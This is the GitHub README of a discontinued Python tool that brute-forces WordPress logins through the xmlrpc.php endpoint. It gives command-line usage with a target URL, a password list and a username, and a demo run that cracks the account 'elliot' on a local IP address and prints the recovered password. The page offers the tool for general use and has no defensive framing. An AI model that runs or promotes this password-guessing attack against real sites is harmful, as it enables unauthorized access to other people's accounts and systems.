Skip to content

Latest commit

 

History

History
61 lines (43 loc) · 1.71 KB

README.md

File metadata and controls

61 lines (43 loc) · 1.71 KB

An XMLRPC BruteForcer for Wordpress - Inpired by (1N3@CrowdShield)

Note - This project is discontinued. No more updates will be provided! Sorry!

I switched to golang :-)

Fork it/do whatever you want with it.

Twitter - Telegram - Blog

Available in

Usage

python3 xmlrcpbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt username
python3 xmlrpcbruteforce.py http://wordpress.org/xmlrpc.php passwords.txt userlist.txt ( >>in progess<<)

Bugs

If you get an xml.etree.ElementTree.ParseError:

  • Did you forget to add 'xmlrpc' in the url ?
  • Try to add or remove 'https' or 'www'.

TODO

  • Exception Handling for xml.etree.ElementTree.ParseError
  • 'userlist' enumeration

Demo

MacBook-Pro: kavish$ python3 xmlrpcbruteforce.py http://192.168.100.34/xmlrpc.php 10k-most-common.txt elliot

---------------Examining Target--------------------

[>] Target is vulnerable.

--=[Target: http://192.168.100.34/xmlrpc.php]=--

        	[...Bruteforcing...]
--=[Tried: 1000 passwords]=--
--=[Tried: 2000 passwords]=--
--=[Tried: 3000 passwords]=--
--------------- BRUTEFORCE SUCCESSFULL  ---------------
--=[User found]=--
Login: elliot
Password: ER28-0652
--=[Exiting...]=--